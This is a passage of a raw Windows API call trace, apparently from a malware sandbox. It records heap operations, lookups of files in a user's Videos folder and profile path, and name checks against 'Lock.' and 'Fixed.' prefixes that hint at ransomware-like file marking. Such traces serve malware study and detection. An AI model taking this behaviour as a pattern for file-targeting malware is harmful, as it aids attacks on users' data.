RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0212.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0212.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0212.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0212.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0212.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0212.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0212.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0212.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0212.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0212.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0212.368] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos/CBK9.flv", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\CBK9.flv", lpFilePart=0x8cf650*="CBK9.flv") returned 0x1f [0212.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0212.368] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\CBK9.flv" (normalized: "c:\\users\\fd1hvy\\videos\\cbk9.flv")) returned 0xffffffff [0212.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74b20 | out: hHeap=0x2af0000) returned 1 [0212.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0212.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0212.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0212.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0212.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0212.368] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0212.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0212.368] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0212.368] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0212.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0212.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0212.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0212.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0212.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0212.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0212.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0212.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0212.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0212.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0212.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0212.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0212.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0212.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dbFeToW6SZRYrK03.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0212.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bFeToW6SZRYrK03.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0212.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FeToW6SZRYrK03.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0212.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eToW6SZRYrK03.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0212.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ToW6SZRYrK03.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0212.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oW6SZRYrK03.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0212.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="W6SZRYrK03.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0212.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6SZRYrK03.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0212.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SZRYrK03.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0212.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZRYrK03.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0212.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RYrK03.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0212.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YrK03.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0212.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rK03.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0212.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K03.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0212.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="03.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0212.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0212.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0212.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0212.370] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0212.370] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0212.370] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0212.370] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0212.370] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0212.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0212.370] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0212.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0212.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0212.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0212.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0212.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0212.370] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0212.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafd8 [0212.370] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0212.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0212.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0212.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0212.370] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0212.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0212.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0212.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0212.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0212.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0212.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0212.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x2a) returned 0x2aa60d0 [0212.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72328 [0212.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dbFeToW6SZRYrK03.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0212.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bFeToW6SZRYrK03.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0212.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FeToW6SZRYrK03.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0212.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eToW6SZRYrK03.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0212.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ToW6SZRYrK03.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0212.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oW6SZRYrK03.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0212.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="W6SZRYrK03.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0212.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6SZRYrK03.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0212.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SZRYrK03.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0212.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZRYrK03.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0212.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RYrK03.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0212.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YrK03.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0212.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rK03.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0212.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K03.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0212.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="03.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0212.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0212.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6418 [0212.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0212.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6418 | out: hHeap=0x2af0000) returned 1 [0212.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0212.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafd8 | out: hHeap=0x2af0000) returned 1 [0212.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0212.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0212.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0212.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0212.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0212.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0212.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0212.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0212.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0212.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0212.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0212.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0212.372] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0212.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0212.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0212.372] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0212.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0212.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0212.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0212.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a78 [0212.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0212.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0212.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0212.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0212.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0212.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0212.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0212.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0212.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0212.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0212.373] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0212.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafd8 [0212.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0212.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf30 [0212.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0212.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafd8 | out: hHeap=0x2af0000) returned 1 [0212.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf48 [0212.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0212.373] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0212.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0212.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0212.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0212.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0212.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0212.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0212.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0212.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0212.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0212.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0212.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0212.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0212.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0212.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0212.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0212.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0212.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a74f30 [0212.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0212.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0212.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0212.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0212.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0212.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0212.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0212.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0212.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0212.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0212.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0212.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71ac8 [0212.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0212.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0212.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0212.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0212.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0212.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0212.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0212.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0212.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0212.374] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0212.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0212.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0212.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf00 [0212.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0212.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0212.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab0f8 [0212.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0212.375] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0212.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0212.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0212.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0212.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0212.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0212.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0212.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0212.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0212.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0212.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0212.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0212.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0212.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0212.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0212.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70a0 [0212.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0212.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a750d0 [0212.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0212.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0212.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0212.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0212.376] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0212.376] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xd0) returned 0x29f7878 [0212.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a750d0 | out: hHeap=0x2af0000) returned 1 [0212.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0212.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70a0 | out: hHeap=0x2af0000) returned 1 [0212.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0212.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0212.376] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a68 [0212.376] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0212.376] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0212.376] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0212.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0212.376] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a88 [0212.376] RtlAllocateHeap (HeapHandle=0x2af0000, 